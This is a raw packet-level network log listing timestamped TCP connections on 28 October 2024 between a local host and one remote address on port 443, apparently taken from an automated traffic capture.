                                                                                                                                                                            Oct 28, 2024 19:12:18.654982090 CET49756443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655016899 CET49756443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655272961 CET49759443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655273914 CET49759443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655278921 CET4434975913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.655286074 CET4434975913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.655694962 CET49756443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655695915 CET49756443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.655725002 CET4434975613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.655750990 CET4434975613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.656407118 CET49758443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.656407118 CET49758443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.656420946 CET4434975813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.656440973 CET4434975813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.658950090 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.658968925 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.659040928 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.660482883 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.660537004 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.660590887 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.661351919 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.661379099 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.661474943 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.661521912 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.661534071 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.662795067 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.662825108 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.662868977 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.662883043 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.664154053 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.664254904 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.664335012 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.664840937 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.664870977 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.665735960 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.665744066 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:18.665827990 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.665915966 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:18.665921926 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.415170908 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.416110039 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.416137934 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.416429996 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.417349100 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.417370081 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.417642117 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.417668104 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.418076992 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.418085098 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.419065952 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.419388056 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.419440985 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.419800043 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.419817924 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.420757055 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421168089 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.421197891 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421679020 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.421688080 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.421873093 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.422485113 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.422537088 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.422863960 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.422878981 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552208900 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552495956 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552692890 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552797079 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552823067 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.552831888 CET49765443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.552839994 CET4434976513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553256989 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553498983 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.553555012 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.554828882 CET49764443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.554841995 CET4434976413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556025982 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556077957 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556185007 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556269884 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.556370974 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.556422949 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557332993 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557332993 CET49766443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.557338953 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.557351112 CET4434976613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559290886 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.559290886 CET49762443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.559305906 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559318066 CET4434976213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.559907913 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.561343908 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.561520100 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.562742949 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.562793016 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.562843084 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.564460039 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.564553022 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.564723969 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.576786995 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.576811075 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.576869011 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.577872992 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.577886105 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.578072071 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.578072071 CET49763443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.578107119 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.578135014 CET4434976313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580862999 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.580888987 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.580893993 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580924988 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.580957890 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581001997 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581037045 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.581238031 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.581264973 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.582395077 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.582412958 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:19.582490921 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.583163023 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:19.583179951 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.332714081 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.333153963 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.333903074 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.334537983 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.334589958 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.335078955 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.335093975 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.336333990 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.336361885 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.336715937 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.336720943 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.341341019 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.341360092 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.341758013 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.341762066 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.342643976 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.342972994 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.342981100 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.343266964 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.343272924 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.346470118 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.346818924 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.346853018 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.347218037 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.347229958 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.471781015 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472151995 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472186089 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472253084 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472259998 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472335100 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472335100 CET49767443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472343922 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472376108 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472403049 CET4434976713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472606897 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472606897 CET49768443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.472650051 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.472676039 CET4434976813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475104094 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475119114 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475142002 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475203991 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475208998 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475263119 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475348949 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475361109 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.475420952 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.475461006 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.476495981 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.476865053 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.476913929 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.476934910 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.476948977 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.476964951 CET49769443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.476972103 CET4434976913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.479332924 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.479342937 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.479408026 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.479753971 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.479763985 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.479872942 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.480022907 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.480068922 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.480634928 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.480653048 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.480664015 CET49771443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.480668068 CET4434977113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.482414961 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.482441902 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.482498884 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.482608080 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.482619047 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.488452911 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.488511086 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.488574028 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.488672018 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.488691092 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.488715887 CET49770443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.488729000 CET4434977013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.490356922 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.490400076 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:20.490467072 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.490580082 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:20.490631104 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.228610039 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.229494095 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.229520082 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.229883909 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.229888916 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.232635021 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.232891083 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.232904911 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.233225107 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.233231068 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.236207008 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.236434937 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.236454010 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.236761093 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.236766100 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.247570038 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.247806072 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.247865915 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.248187065 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.248199940 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.248910904 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.249159098 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.249167919 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.249432087 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.249435902 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.366322994 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.366401911 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.366632938 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.366689920 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.366729021 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.366781950 CET49774443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.366796970 CET4434977413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.369745016 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.369786024 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.369927883 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.370096922 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.370110035 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.373893976 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.374034882 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.374128103 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.374202013 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.374202013 CET49776443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.374212027 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.374219894 CET4434977613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.376557112 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.376606941 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.376919031 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.376919031 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.376965046 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.377305984 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.377366066 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.377531052 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.377531052 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.377531052 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.380157948 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.380194902 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.380408049 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.380644083 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.380656958 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.384850979 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.385025978 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.385106087 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.385245085 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.385245085 CET49777443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.385270119 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.385294914 CET4434977713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.386984110 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.387027979 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.387111902 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.387244940 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.387259960 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.390518904 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.390573978 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.390712023 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.390768051 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.390783072 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.390815973 CET49773443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.390820980 CET4434977313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.392853975 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.392879009 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.392954111 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.393098116 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.393101931 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:21.681744099 CET49775443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:21.681756973 CET4434977513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.153451920 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.155158043 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.155170918 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.155785084 CET49780443192.168.2.413.107.253.45
